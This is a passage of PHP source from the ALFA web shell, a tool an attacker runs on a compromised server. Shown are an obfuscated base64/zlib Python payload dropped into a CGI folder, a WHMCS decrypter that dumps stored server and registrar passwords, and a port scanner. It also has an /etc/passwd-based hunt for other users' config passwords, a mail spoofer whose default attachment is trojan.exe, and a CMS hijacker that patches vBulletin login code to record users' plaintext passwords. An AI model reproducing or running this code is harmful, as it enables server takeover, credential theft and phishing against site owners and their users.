            $py = "#!/usr/bin/python\nimport zlib, base64\neval(compile(zlib.decompress(base64.b64decode(\"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\")),'<string>','exec'))";
            if ($_POST['alfa1'] == 'perl') {
                $code = $perl;
            } else {
                $code = $py;
            }
            if (__write_file($name, $code)) {
                @chmod($name, 0755);
                echo "<iframe src=\"ALFA_DATA/cgialfa/" . $name . '" width="100%" height="600px" frameborder="0" style="opacity:0.9;filter: alpha(opacity=9);overflow:auto;"></iframe>';
            }
        }
        echo $div;
        alfafooter();
    }
    function alfaWhmcs()
    {
        alfahead();
        echo "<div class=header>";
        function decrypt($string, $cc_encryption_hash)
        {
            $key = md5(md5($cc_encryption_hash)) . md5($cc_encryption_hash);
            $hash_key = _hash($key);
            $hash_length = strlen($hash_key);
            $string = __ZGVjb2Rlcg($string);
            $tmp_iv = substr($string, 0, $hash_length);
            $string = substr($string, $hash_length, strlen($string) - $hash_length);
            $iv = $out = '';
            $c = 0;
            while ($c < $hash_length) {
                $iv .= chr(ord($tmp_iv[$c]) ^ ord($hash_key[$c]));
                ++$c;
            }
            $key = $iv;
            $c = 0;
            while ($c < strlen($string)) {
                if ($c != 0 and $c % $hash_length == 0) {
                    $key = _hash($key . substr($out, $c - $hash_length, $hash_length));
                }
                $out .= chr(ord($key[$c % $hash_length]) ^ ord($string[$c]));
                ++$c;
            }
            return $out;
        }
        function _hash($string)
        {
            if (function_exists('sha1')) {
                $hash = sha1($string);
            } else {
                $hash = md5($string);
            }
            $out = '';
            $c = 0;
            while ($c < strlen($hash)) {
                $out .= chr(hexdec($hash[$c] . $hash[$c + 1]));
                $c += 2;
            }
            return $out;
        }
        AlfaNum(8, 9, 10);
        echo "<center><br><div class='txtfont_header'>| WHMCS DeCoder |</div><p>" . getConfigHtml('whmcs') . "</p><form onsubmit=\"g('Whmcs',null,this.form_action.value,'decoder',this.db_username.value,this.db_password.value,this.db_name.value,this.cc_encryption_hash.value,this.db_host.value); return false;\">\r\n<input type='hidden' name='form_action' value='2'>";
        $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'cc_encryption_hash : ', 'inputName' => 'cc_encryption_hash', 'id' => 'cc_encryption_hash', 'inputValue' => '', 'inputSize' => '50'));
        create_table($table);
        echo "<p><input type='submit' value=' ' name='Submit'></p></form></center>";
        if ($_POST['alfa5'] != '') {
            $db_host = $_POST['alfa7'];
            $db_username = $_POST['alfa3'];
            $db_password = $_POST['alfa4'];
            $db_name = $_POST['alfa5'];
            $cc_encryption_hash = $_POST['alfa6'];
            echo __pre();
            $conn = @mysqli_connect($db_host, $db_username, $db_password, $db_name) or die(mysqli_error($conn));
            $query = mysqli_query($conn, "SELECT * FROM tblservers");
            $num = mysqli_num_rows($query);
            if ($num > 0) {
                for ($i = 0; $i <= $num - 1; $i++) {
                    $v = @mysqli_fetch_array($query);
                    $ipaddress = $v['ipaddress'];
                    $username = $v['username'];
                    $type = $v['type'];
                    $active = $v['active'];
                    $hostname = $v['hostname'];
                    echo "<center><table border='1'>";
                    $password = decrypt($v['password'], $cc_encryption_hash);
                    echo "<tr><td><b><font color=\"#FFFFFF\">Type</font></td><td>{$type}</td></tr></b>";
                    echo "<tr><td><b><font color=\"#FFFFFF\">Active</font></td><td>{$active}</td></tr></b>";
                    echo "<tr><td><b><font color=\"#FFFFFF\">Hostname</font></td><td>{$hostname}</td></tr></b>";
                    echo "<tr><td><b><font color=\"#FFFFFF\">Ip</font></td><td>{$ipaddress}</td></tr></b>";
                    echo "<tr><td><b><font color=\"#FFFFFF\">Username</font></td><td>{$username}</td></tr></b>";
                    echo "<tr><td><b><font color=\"#FFFFFF\">Password</font></td><td>{$password}</td></tr></b>";
                    echo "</table><br><br></center>";
                }
                $query1 = @mysqli_query($conn, "SELECT * FROM tblregistrars");
                $num1 = @mysqli_num_rows($query1);
                if ($num1 > 0) {
                    for ($i = 0; $i <= $num1 - 1; $i++) {
                        $v = mysqli_fetch_array($query1);
                        $registrar = $v['registrar'];
                        $setting = $v['setting'];
                        $value = decrypt($v['value'], $cc_encryption_hash);
                        if ($value == "") {
                            $value = 0;
                        }
                        echo "<center>Domain Reseller <br><center>";
                        echo "<center><table border='1'>";
                        echo "<tr><td><b><font color=\"#67ABDF\">Register</font></td><td>{$registrar}</td></tr></b>";
                        echo "<tr><td><b><font color=\"#67ABDF\">Setting</font></td><td>{$setting}</td></tr></b>";
                        echo "<tr><td><b><font color=\"#67ABDF\">Value</font></td><td>{$value}</td></tr></b>";
                        echo "</table><br><br></center>";
                    }
                }
            } else {
                __alert('<font color="red">tblservers is Empty...!</font>');
            }
        }
        echo "</div>";
        alfafooter();
    }
    function alfaportscanner()
    {
        alfahead();
        echo "<div class=header><center><p><div class=\"txtfont_header\">| Port Scaner |</div></p>\r\n<form action=\"\" method=\"post\" onsubmit=\"g('portscanner',null,null,this.start.value,this.end.value,this.host.value); return false;\">\r\n<input type=\"hidden\" name=\"y\" value=\"phptools\">\r\n<div class=\"txtfont\">Host: </div> <input id=\"text\" type=\"text\" name=\"host\" value=\"localhost\"/>\r\n<div class=\"txtfont\">Port start: </div> <input id=\"text\" size=\"5\" type=\"text\"  name=\"start\" value=\"80\"/>\r\n<div class=\"txtfont\">Port end: </div> <input id=\"text\" size=\"5\" type=\"text\" name=\"end\" value=\"80\"/> <input type=\"submit\" value=\" \" />\r\n</form></center><br>";
        $start = strip_tags($_POST['alfa2']);
        $end = strip_tags($_POST['alfa3']);
        $host = strip_tags($_POST['alfa4']);
        if (isset($_POST['alfa4']) && is_numeric($_POST['alfa3']) && is_numeric($_POST['alfa2'])) {
            echo __pre();
            $packetContent = "GET / HTTP/1.1\r\n\r\n";
            if (ctype_xdigit($packetContent)) {
                $packetContent = @pack("H*", $packetContent);
            } else {
                $packetContent = str_replace(array("\r", "\n"), "", $packetContent);
                $packetContent = str_replace(array("\\r", "\\n"), array("\r", "\n"), $packetContent);
            }
            for ($i = $start; $i <= $end; $i++) {
                $sock = @fsockopen($host, $i, $errno, $errstr, 3);
                if ($sock) {
                    stream_set_timeout($sock, 5);
                    fwrite($sock, $packetContent . "\r\n\r\n\x00");
                    $counter = 0;
                    $maxtry = 1;
                    $bin = "";
                    do {
                        $line = fgets($sock, 1024);
                        if (trim($line) == "") {
                            $counter++;
                        }
                        $bin .= $line;
                    } while ($counter < $maxtry);
                    fclose($sock);
                    echo "<center><p>Port <font style='color:#DE3E3E'>{$i}</font> is open</p>";
                    echo "<p><textarea style='height:140px;width:50%;'>" . $bin . "</textarea></p></center>";
                }
                flush();
            }
        }
        echo "</div>";
        alfafooter();
    }
    function alfacgihtaccess($m, $d = '', $symname = false)
    {
        $readme = "";
        if ($symname) {
            $readme = "\nReadmeName " . trim($symname);
        }
        if ($m == 'cgi') {
            $code = "#Coded By Sole Sad & Invisible\nOptions FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .alfa\nAddHandler cgi-script .alfa";
        } elseif ($m == 'sym') {
            $code = "#Coded By Sole Sad & Invisible\nOptions Indexes FollowSymLinks\nDirectoryIndex solevisible.phtm\nAddType text/plain php html php4 phtml\nAddHandler text/plain php html php4 phtml{$readme}\nOptions all";
        } elseif ($m == 'shtml') {
            $code = "Options +Includes\nAddType text/html .shtml\nAddHandler server-parsed .shtml";
        }
        @__write_file($d . ".htaccess", $code);
    }
    function alfabasedir()
    {
        alfahead();
        echo "<div class=header>\r\n<center><p><div class=\"txtfont_header\">| Open Base Dir |</div></p></center>";
        $passwd = _alfa_file('/etc/passwd');
        if (is_array($passwd)) {
            $users = array();
            $makepwd = alfaMakePwd();
            $basedir = @ini_get('open_basedir');
            $safe_mode = @ini_get('safe_mode');
            if (_alfa_can_runCommand(true, false) && ($basedir || $safe_mode)) {
                $bash = "fZBPSwMxEMXPzacYx9jugkvY9lbpTQ9eFU9NWdYk2wYkWZKsgmu+u9NaS8E/cwgDL/N+M+/yQjxbJ+KO3d4/rHjNusGpZL2DmEITTP/SKlOUIwOqNVTvgLxG2MB0CsGkITioz7X5P9riN60hzhHTvLYn5IoXfbAudYBXUUqHX9wPiEZDZQCj4OM807PIYovlwevHxPiHe0aWmVE7f7BaS4Ws8wEsWAe8UEOCSi+h6moQJinRtzG+6fIGtGeTp8c7Cqo4i4dAFB7xxiGakPdgSxtN6OxA/X7gePk3UtIPiddMe2dOe8wQN7NP";
                $tmp_path = alfaWriteTocgiapi("basedir.alfa", $bash);
                $bash_users = alfaEx("cd " . $tmp_path . "/alfacgiapi;sh basedir.alfa " . $makepwd, false, true, true);
                $users = json_decode($bash_users, true);
                $x = count($users);
                if ($x >= 2) {
                    array_pop($users);
                    --$x;
                }
            }
            if (!$basedir && !$safe_mode) {
                $x = 0;
                foreach ($passwd as $str) {
                    $pos = strpos($str, ':');
                    $username = substr($str, 0, $pos);
                    $dirz = str_replace("{user}", $username, $makepwd);
                    if ($username != '') {
                        if (@is_readable($dirz)) {
                            array_push($users, $username);
                            $x++;
                        }
                    }
                }
            }
            echo "<br><br>";
            echo "<b><font color=\"#00A220\">[+] Founded " . sizeof($passwd) . " entrys in /etc/passwd\n" . "<br /></font></b>";
            echo "<b><font color=\"#FFFFFF\">[+] Founded " . $x . " readable " . str_replace("{user}", "*", $makepwd) . " directories\n" . "<br /></font></b>";
            echo "<b><font color=\"#FF0000\">[~] Searching for passwords in config files...\n\n<br /><br /><br /></font></b>";
            foreach ($users as $user) {
                if (empty($user)) {
                    continue;
                }
                $path = str_replace("{user}", $user, $makepwd);
                echo "<form method=post onsubmit='g(\"FilesMan\",this.c.value,\"\");return false;'><span><font color=#27979B>Change Dir <font color=#FFFF01>..:: </font><font color=red><b>{$user}</b></font><font color=#FFFF01> ::..</font></font></span><br><input class='foottable' type=text name=c value='{$path}'><input type=submit value='>>'></form><br>";
            }
        } else {
            echo "<b> <center><font color=\"#FFFFFF\">[-] Error : coudn`t read /etc/passwd [-]</font></center></b>";
        }
        echo "<br><br></b>";
        echo "</div>";
        alfafooter();
    }
    function alfamail()
    {
        alfahead();
        echo "<div class=header>";
        AlfaNum(8, 9, 10);
        echo "<center><p><div class=\"txtfont_header\">| Fake Mail |</div></p><form action=\"\" method=\"post\" onsubmit=\"g('mail',null,this.mail_to.value,this.mail_from.value,this.mail_subject.value,'>>',this.mail_content.value,this.count_mail.value,this.mail_attach.value); return false;\">";
        $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mail To : ', 'inputName' => 'mail_to', 'inputValue' => 'target@fbi.gov', 'inputSize' => '60', 'placeholder' => true), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'From : ', 'inputName' => 'mail_from', 'inputValue' => 'sec@google.com', 'inputSize' => '60', 'placeholder' => true), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Subject : ', 'inputName' => 'mail_subject', 'inputValue' => 'your site hacked by me', 'inputSize' => '60'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Attach File : ', 'inputName' => 'mail_attach', 'inputValue' => $GLOBALS['cwd'] . 'trojan.exe', 'inputSize' => '60'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Count Mail : ', 'inputName' => 'count_mail', 'inputValue' => '1', 'inputSize' => '60'));
        create_table($table);
        echo "<p><div class=\"txtfont\">Message:</div></p><textarea rows=\"6\" cols=\"60\" name=\"mail_content\">Hi Dear Admin :)</textarea><p><input type=\"submit\" value=\" \" name=\"mail_send\" /></p></form></center>";
        if (isset($_POST['alfa4']) && $_POST['alfa4'] == '>>') {
            $mail_to = $_POST['alfa1'];
            $mail_from = $_POST['alfa2'];
            $mail_subject = $_POST['alfa3'];
            $mail_content = $_POST['alfa5'];
            $count_mail = (int) $_POST['alfa6'];
            $mail_attach = $_POST['alfa7'];
            if (filter_var($mail_to, FILTER_VALIDATE_EMAIL)) {
                if (!empty($mail_attach) && @is_file($mail_attach)) {
                    $file = $mail_attach;
                    $content = __read_file($file);
                    $content = chunk_split(__ZW5jb2Rlcg($content));
                    $uid = md5(uniqid(time()));
                    $filename = basename($file);
                    $headers = "From: " . $mail_from . " <" . $mail_from . ">\r\n";
                    $headers .= "To: " . $mail_to . " ( " . $mail_to . " ) \r\n";
                    $headers .= "Reply-To: " . $mail_from . "\r\n";
                    $headers .= "Content-Type: multipart/mixed; boundary=\"" . $uid . "\"\r\n\r\n";
                    $headers .= "MIME-Version: 1.0\r\n";
                    $headers .= "X-Mailer: php\r\n";
                    $mail_content = "--" . $uid . "\r\n";
                    $mail_content .= "Content-type:text/plain; charset=iso-8859-1\r\n";
                    $mail_content .= "Content-Transfer-Encoding: 7bit\r\n\r\n";
                    $mail_content .= $mail_content . "\r\n\r\n";
                    $mail_content .= "--" . $uid . "\r\n";
                    $mail_content .= "Content-Type: application/octet-stream; name=\"" . $filename . "\"\r\n";
                    $mail_content .= "Content-Transfer-Encoding: base64\r\n";
                    $mail_content .= "Content-Disposition: attachment; filename=\"" . $filename . "\"\r\n\r\n";
                    $mail_content .= $content . "\r\n\r\n";
                    $mail_content .= "--" . $uid . "--";
                } else {
                    $headers = "From: " . $mail_from . " ( " . $mail_from . " ) \r\n";
                    $headers .= "To: " . $mail_to . " ( " . $mail_to . " ) \r\n";
                    $headers .= 'Reply-To: ' . $mail_from . '' . "\r\n";
                    $headers .= "Content-type: text/html; charset=utf-8\r\n";
                    $headers .= "MIME-Version: 1.0\r\n";
                    $headers .= "X-Mailer: php\r\n";
                }
                if (empty($count_mail) || $count_mail < 1) {
                    $count_mail = 1;
                }
                if (!empty($mail_from)) {
                    echo __pre();
                    for ($i = 1; $i <= $count_mail; $i++) {
                        if (@mail($mail_to, $mail_subject, $mail_content, $headers)) {
                            echo "<center>Sent -> {$mail_to}<br></center>";
                        }
                    }
                } else {
                    __alert("Invalid Mail From !");
                }
            } else {
                __alert("Invalid Mail To !");
            }
        }
        echo "</div>";
        alfafooter();
    }
    function alfaziper()
    {
        alfahead();
        AlfaNum(8, 9, 10);
        echo '<div class=header><p><center><p><div class="txtfont_header">| Compressor |</div></p>
<form onSubmit="g(\'ziper\',null,null,null,this.dirzip.value,this.zipfile.value,\'>>\');return false;" method="post">
<div class="txtfont">Dir/File: </div> <input type="text" name="dirzip" value="' . (!empty($_POST['alfa3']) ? htmlspecialchars($_POST['alfa3']) : htmlspecialchars($GLOBALS['cwd'])) . '" size="60"/>
<div class="txtfont">Save Dir: </div> <input type="text" name="zipfile" value="' . $GLOBALS['cwd'] . 'alfa.zip" size="60"/>
<input type="submit" value=" " name="ziper" />
</form></center></p>';
        if (isset($_POST['alfa5']) && $_POST['alfa5'] == '>>') {
            $dirzip = $_POST['alfa3'];
            $zipfile = $_POST['alfa4'];
            if ($GLOBALS['sys'] != 'unix' && _alfa_can_runCommand(true, true)) {
                alfaEx("powershell Compress-Archive -Path '" . addslashes($dirzip) . "' -DestinationPath '" . addslashes(basename($zipfile)) . "'");
                echo __pre() . '<center><p>Done -> <b><font color="green">' . $zipfile . '</font></b></p></center>';
            } elseif ($GLOBALS['sys'] == 'unix' && _alfa_can_runCommand(true, true)) {
                alfaEx("cd '" . addslashes(dirname($zipfile)) . "';zip -r '" . addslashes(basename($zipfile)) . "' '" . addslashes($dirzip) . "'");
                echo __pre() . '<center><p>Done -> <b><font color="green">' . $zipfile . '</font></b></p></center>';
            } elseif (class_exists('ZipArchive')) {
                if (__alfaziper($dirzip, $zipfile)) {
                    echo __pre() . '<center><p><font color="green">Success...!<br>' . $zipfile . '</font></p></center>';
                } else {
                    echo __pre() . '<center><p><font color="red">ERROR!!!...</font></p></center>';
                }
            }
        }
        echo "</div>";
        alfafooter();
    }
    function __alfaziper($source, $destination)
    {
        if (!extension_loaded('zip') || !file_exists($source)) {
            return false;
        }
        $zip = new ZipArchive();
        if (!$zip->open($destination, ZIPARCHIVE::CREATE)) {
            return false;
        }
        $source = str_replace('\\', '/', realpath($source));
        if (is_dir($source) === true) {
            $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
            foreach ($files as $file) {
                $file = str_replace('\\', '/', $file);
                if (in_array(substr($file, strrpos($file, '/') + 1), array('.', '..'))) {
                    continue;
                }
                $file = realpath($file);
                if (is_dir($file) === true) {
                    $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
                } else {
                    if (is_file($file) === true) {
                        $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
                    }
                }
            }
        } else {
            if (is_file($source) === true) {
                $zip->addFromString(basename($source), file_get_contents($source));
            }
        }
        return $zip->close();
    }
    function alfadeziper()
    {
        alfahead();
        AlfaNum(8, 9, 10);
        echo '<div class=header><p><center><p><div class="txtfont_header">| DeCompressor |</div></p>
<form onSubmit="g(\'deziper\',null,null,null,this.dirzip.value,this.zipfile.value,\'>>\');return false;" method="post">
<div class="txtfont">File: </div> <input type="text" name="dirzip" value="' . (!empty($_POST['alfa3']) ? htmlspecialchars($_POST['alfa3']) : htmlspecialchars($GLOBALS['cwd'])) . '" size="60"/>
<div class="txtfont">Extract To: </div> <input type="text" name="zipfile" value="' . $GLOBALS['cwd'] . '" size="60"/>
<input type="submit" value=" " name="ziper" />
</form></center></p>';
        if (isset($_POST['alfa5']) && $_POST['alfa5'] == '>>') {
            $dirzip = $_POST['alfa3'];
            $zipfile = $_POST['alfa4'];
            if (@(!is_dir($zipfile))) {
                @mkdir($zipfile, 0777, true);
            }
            $finfo = "";
            $file_type = "";
            if (function_exists('finfo_open')) {
                $finfo = @finfo_open(FILEINFO_MIME_TYPE);
                $file_type = @finfo_file($finfo, $dirzip);
                @finfo_close($finfo);
            } else {
                if ($GLOBALS['sys'] == 'unix' && _alfa_can_runCommand(true, true)) {
                    $file_type = alfaEx('file -b --mime-type ' . $dirzip);
                }
            }
            if ($GLOBALS['sys'] != 'unix' && _alfa_can_runCommand(true, true)) {
                alfaEx("powershell expand-archive -path '" . addslashes($dirzip) . "' -destinationpath '" . addslashes(basename($zipfile)) . "'");
                echo __pre() . '<center><p>Done -> <b><font color="green">' . $zipfile . '</font></b></p></center>';
            } elseif ($GLOBALS['sys'] == 'unix' && !empty($file_type) && _alfa_can_runCommand(true, true) && (strlen(alfaEx('which unzip')) > 0 || strlen(alfaEx('which tar')) > 0 || strlen(alfaEx('which gunzip')) > 0)) {
                switch ($file_type) {
                    case 'application/zip':
                        alfaEx("cd '" . addslashes($zipfile) . "';unzip '" . addslashes($dirzip) . "'");
                        break;
                    case 'application/x-tar':
                    case 'application/x-gzip':
                    case 'application/x-gtar':
                        if (strstr(basename($dirzip), ".tar.gz") || strstr(basename($dirzip), ".tar")) {
                            alfaEx("cd '" . addslashes($zipfile) . "';tar xzf '" . addslashes($dirzip) . "'");
                        } else {
                            alfaEx("cd '" . addslashes($zipfile) . "';gunzip '" . addslashes($dirzip) . "'");
                        }
                        break;
                }
                echo __pre() . '<center><p>Done -> <b><font color="green">' . $zipfile . '</font> <a style="cursor:pointer;" onclick="g(\'FilesMan\',\'' . $zipfile . '\');">[ View Folder ]</a></b></p></center>';
            } elseif (class_exists('ZipArchive')) {
                $itsok = false;
                if (emtpy($file_type)) {
                    $file_type = "application/zip";
                }
                switch ($file_type) {
                    case 'application/zip':
                        $zip = new ZipArchive();
                        $res = $zip->open($dirzip);
                        if ($res) {
                            $zip->extractTo($zipfile);
                            $zip->close();
                            $itsok = true;
                        }
                        break;
                    case 'application/x-tar':
                    case 'application/x-gzip':
                    case 'application/x-gtar':
                        if (strstr(basename($dirzip), ".tar.gz")) {
                            $new_file = $zipfile . '/' . basename($dirzip);
                            @copy($dirzip, $new_file);
                            $new_tar = str_replace(".tar.gz", ".tar", $new_file);
                            try {
                                $p = new PharData($new_file);
                                $p->decompress();
                                $phar = new PharData($new_tar);
                                $phar->extractTo($zipfile);
                                @unlink($new_file);
                                @unlink($new_tar);
                                $itsok = true;
                            } catch (Exception $e) {
                            }
                        } else {
                            try {
                                $phar = new PharData($dirzip);
                                $phar->extractTo($zipfile);
                                $itsok = true;
                            } catch (Exception $e) {
                            }
                        }
                        break;
                }
                if ($itsok) {
                    echo __pre() . '<center><p><font color="green">Success...!<br>' . $zipfile . '</font> <a style="cursor:pointer;" onclick="g(\'FilesMan\',\'' . $zipfile . '\');">[ View Folder ]</a></p></center>';
                } else {
                    echo __pre() . '<center><p><font color="red">ERROR!!!...</font></p></center>';
                }
            }
        }
        echo "</div>";
        alfafooter();
    }
    function alfacmshijacker()
    {
        alfahead();
        AlfaNum(5, 6, 7, 8, 9, 10);
        echo "<div class=header><br>\r\n<center><div class=\"txtfont_header\">| Cms Hijacker |</div><br><br><form onSubmit=\"g('cmshijacker',null,this.cmshi.value,this.saveto.value,'>>',this.cmspath.value);return false;\" method='post'>\r\n<div class=\"txtfont\">CMS: <select style=\"width:100px;\" name=\"cmshi\">";
        $cm_array = array("vb" => "vBulletin", "wp" => "wordpress", "jom" => "joomla", "whmcs" => "whmcs", "mybb" => "mybb", "ipb" => "ipboard", "phpbb" => "phpbb");
        foreach ($cm_array as $key => $val) {
            echo '<option value="' . $key . '">' . $val . '</option>';
        }
        echo "</select>";
        echo ' Path installed cms: <input size="50" type="text" name="cmspath" placeholder="ex: /home/user/public_html/vbulletin/">
SaveTo: <input size="50" type="text" name="saveto" value="' . $GLOBALS['cwd'] . 'alfa.txt"></font>
<input type="submit" name="btn" value=" "></form></center><br>';
        $cms = $_POST['alfa1'];
        $saveto = $_POST['alfa2'];
        $cmspath = $_POST['alfa4'];
        if (!empty($cms) and !empty($saveto) and $_POST['alfa4'] and $_POST['alfa3'] == '>>') {
            echo __pre();
            alfaHijackCms($cms, $cmspath, $saveto);
        }
        echo "</div>";
        alfafooter();
    }
    function alfaHijackCms($cms, $cmspath, $saveto)
    {
        switch ($cms) {
            case "vb":
                hijackvBulletin($cmspath, $saveto);
                break;
            case "wp":
                hijackwp($cmspath, $saveto);
                break;
            case "jom":
                hijackJoomla($cmspath, $saveto);
                break;
            case "whmcs":
                hijackWhmcs($cmspath, $saveto);
                break;
            case "mybb":
                hijackMybb($cmspath, $saveto);
                break;
            case "ipb":
                hijackIPB($cmspath, $saveto);
                break;
            case "phpbb":
                hijackPHPBB($cmspath, $saveto);
                break;
            default:
                echo "error!";
                break;
        }
    }
    function hijackvBulletin($path, $saveto)
    {
        $code = '$alfa_username = strtolower($vbulletin->GPC["vb_login_username"]);$alfa_password = $vbulletin->GPC["vb_login_password"];$alfa_file = "{saveto_path}";$sql_query = $vbulletin->db->query_read("SELECT * FROM " . TABLE_PREFIX . "user WHERE `username`=\'" . $alfa_username . "\'");while($row = $vbulletin->db->fetch_array($sql_query)){if(strlen($alfa_password) > 1 AND strlen($alfa_username) > 1){$fp1 = @fopen($alfa_file, "a+");@fwrite($fp1, $alfa_username . \' : \' .  $alfa_password." (" . $row["email"] . ")\\n");@fclose($fp1); $f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}';
        $clearpw = 'defined(\'DISABLE_PASSWORD_CLEARING\')';
        $code = str_replace('{saveto_path}', $saveto, $code);
        $login = $path . "/login.php";
        $class = $path . "/includes/class_bootstrap.php";
        $dologin = 'do_login_redirect();';
        $evil_login = "\t" . $code . "\n\t" . $dologin;
        $evil_class = "true";
        if ((@is_file($login) and @is_writable($login)) || (@is_file($class) and @is_writable($class))) {
            $data_login = @file_get_contents($login);
            $data_class = @file_get_contents($class);
            if (strstr($data_login, $dologin) || strstr($data_class, $clearpw)) {
                $login_replace = str_replace($dologin, $evil_login, $data_login);
                $class_replace = str_replace($clearpw, $evil_class, $data_class);
                @file_put_contents($login, $login_replace);
                @file_put_contents($class, $class_replace);
                hijackOutput(0, $saveto);
            } else {
                hijackOutput(1);
            }
        } else {
            hijackOutput(1);
        }
    }
    function hijackwp($path, $saveto)
    {
